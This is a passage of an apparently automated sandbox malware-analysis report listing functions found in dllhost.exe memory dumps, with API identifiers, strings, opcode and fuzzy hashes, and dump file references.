                                            • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction Fuzzy Hash: D271C332620B8142F7749F2AA8583EAE794F38CB84F44401ADD0943BAADFB6C720D740
                                            Function 0000020175E880A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000003.2869389293.0000020175E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020175E80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_3_20175e80000_dllhost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3242871069-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 240b348ba591aa1e5b19340637ea0787a91ff7119cff276b9cd25c82989e8642
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: BA51E332359B008AFB54CF15E448B6DF392F344B88F15A921DE46437AADFB8EA61C700
                                            Function 0000020175E89AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000003.2869389293.0000020175E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020175E80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_3_20175e80000_dllhost.jbxd
                                            Similarity
                                            • API ID: CallTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3163161869-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: 811d4ffb98dc9d233e6165db154bc34841affafe0ac62184298f8f251a86d394
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: 3861A373908BC485E7719F15E44479AF7A0F785B98F045215EF9857BA6CFB8E2A0CB00
                                            Function 0000020175EE25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction ID: 8171af9a125c27db1cc64ddb86ace554fdda27bb41885fc41597da02c7867104
                                            • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction Fuzzy Hash: 5251163722478181FB649E25A45C3AAE751F39DB80F540029DD4943BABDFBBC724E740
                                            Function 0000020175EB25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction ID: 1f06067405b40fd82fc760fb4dd073a6e25f99fb4199ff1481cc77ec942db028
                                            • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction Fuzzy Hash: CB5126372147E181EB249E29A45CBAAE751FB84782F440025DE4943BBBDFBBC620C754
                                            Function 0000020175EF2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction ID: ab2b79a212859c2f5f11f51e96d0048e4192331a59c1a7d5ad5dceae5862bcdc
                                            • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction Fuzzy Hash: 5F411733625B8086E750DF65E80879AF7A0F388784F840122EE4D877E9EFB9C611CB40
                                            Function 0000020175EC2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction ID: 0a0b5e9829fe41f79401f833e6f9d4dc0301e40be2113f80ac34c167d53fcfa3
                                            • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction Fuzzy Hash: B1411733625B8086E710DF25E4487DAF7A0F348784F804122EE8D87769EFB9C651CB50
                                            Function 0000020175EE9178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction ID: 14142a2abb3c38654503ac762a82b70e219fc3f6916c114fea68003a95a2f8b0
                                            • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction Fuzzy Hash: 2E113032215B4082EB618F25F848259F7E5F788B94F594225DECD47769EF7CC661CB00
                                            Function 0000020175EB9178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction ID: 91075b45d6403016d119eee536c191ac490e5736f4a0368ab35acf38d4002181
                                            • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction Fuzzy Hash: 7F110A32214B8082EB618F25F848659F7E5FB88B94F594225EECD47B69DF7CC661CB00
                                            Function 00000001400020CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: AddressHandleModuleProc
                                            • String ID: ntdll.dll
                                            • API String ID: 1646373207-2227199552
                                            • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                            • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                                            • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                            • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                                            Function 0000020175EE1D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction ID: 21bcbe9eb08e96f41574b13bc9bdf5b55190d8eb46002c2f2220e2dc0650844c
                                            • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction Fuzzy Hash: 7A11AD21A11F8081EB59CB66A80825DE7A0F78CFC1F594065DE4E537B6EF78D692C340
                                            Function 0000020175EB1D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction ID: 9934bf8e3120549a92ca91d0354f1b3eee924f673dae606d522ce3de3f97881c
                                            • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction Fuzzy Hash: 12116D21A01F8085EB18CB66A80C66EE7A1F788FD1F594125DE4E53776EF78D552C340
                                            Function 0000000140001220 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                            • Instruction ID: 6e91e1ae57bb2f507bdd30ccb813d710b9eda330d3ff7d449275dd8231ce62c3
                                            • Opcode Fuzzy Hash: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                            • Instruction Fuzzy Hash: EBE032F1B41A0086E709DB63E80838936E1EB9CB85F898024AA0907371DF7D85D98B90
                                            Function 0000020175EE1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction ID: f75b89b0be3653d734052a4b8f02e29eb73d101c453bd6fc03bd5ed26f405af9
                                            • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction Fuzzy Hash: BEE06D31601B049AE7548F62D80C349BAE1FB98F06F45C024C909073A1EFBD97A9C740
                                            Function 0000020175EB1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3398897487.0000020175EB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EB0000, based on PE: true
                                            • Associated: 00000026.00000002.3398094589.0000020175EB0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3399880903.0000020175EC5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3400722928.0000020175ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3401564420.0000020175ED2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3402383271.0000020175ED9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175eb0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction ID: cb99b5e6ee7f7de320ef7756ea76609db434d75e863704dd9919fdba4737a6db
                                            • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction Fuzzy Hash: F5E06D31601B049AE7148F62D80C369B6E1FB88F05F46C024C90907361EFBDC5A9C740
                                            Function 0000000140001000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3378694480.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000026.00000002.3377475108.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3379713480.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3380589877.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                            • Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
                                            • Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                            • Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654
                                            Function 0000020175EE1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000026.00000002.3403865831.0000020175EE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000020175EE0000, based on PE: true
                                            • Associated: 00000026.00000002.3403020177.0000020175EE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3404829611.0000020175EF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3405682056.0000020175F00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3406456934.0000020175F02000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000026.00000002.3407392088.0000020175F09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_38_2_20175ee0000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction ID: dd5d7addd19cc3a3129c10dc5c839eeffd6f4debba431fe39a9f7dc969d36a0c
                                            • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction Fuzzy Hash: D6E06D71611B049AE7588B22D808248B6A1FB98B02F458021C909073A0FF7897A8D610